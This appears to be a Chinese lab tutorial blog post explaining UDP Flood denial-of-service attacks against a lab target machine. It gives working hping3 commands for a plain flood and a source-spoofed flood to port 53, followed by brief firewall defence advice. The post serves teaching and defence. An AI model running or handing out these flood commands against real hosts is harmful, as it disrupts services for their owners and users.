『网络协议攻防实验』UDP Flood攻击

本文详细解析了UDP Flood攻击原理,展示了如何使用hping3工具实施攻击,并介绍了针对UDP协议的防御措施,包括防火墙设置和资源消耗分析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

  • 靶机:seedubuntu 12.01,IP:192.168.199.138
  • 攻击机:Kali-2020.4,IP:192.168.199.129
  • 工具:hping3

原理

由于UDP协议的无状态不可靠的天然特性,UDP Flood拒绝服务攻击的原理非常简单,即通过向目标主机和网络发送大量的UDP数据包,造成目标主机显著的计算负载提升,或者目标网络的网络拥塞,从而使得目标主机和网络陷入不可用的状态,造成拒绝服务攻击。

UDP Flood攻击

在seedubuntu上开启tcpdump监听

tcpdump -i eth0 udp -n

在kali中向seed发起udp flood攻击

hping3 --udp -p 53 192.168.199.138

然后在seedubuntu中就能看到连接了

在这里插入图片描述

攻击进一步升级,使用工具自带的随机源地址参数进行源地址欺骗udp flood攻击:

hping3 --udp -p 53 --flood --rand-source 192.168.199.138

在这里插入图片描述

在这里插入图片描述

对UDP Flood攻击的防御

UDP是无状态连接协议,常用于僵尸网络的DDOS攻击,比起TCP来说更难防御。通过设置防火墙,对UDP包的IP,端口,速率可针对性防御。另外,UDP Flood除了消耗受害者资源,也会消耗大量攻击者资源。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值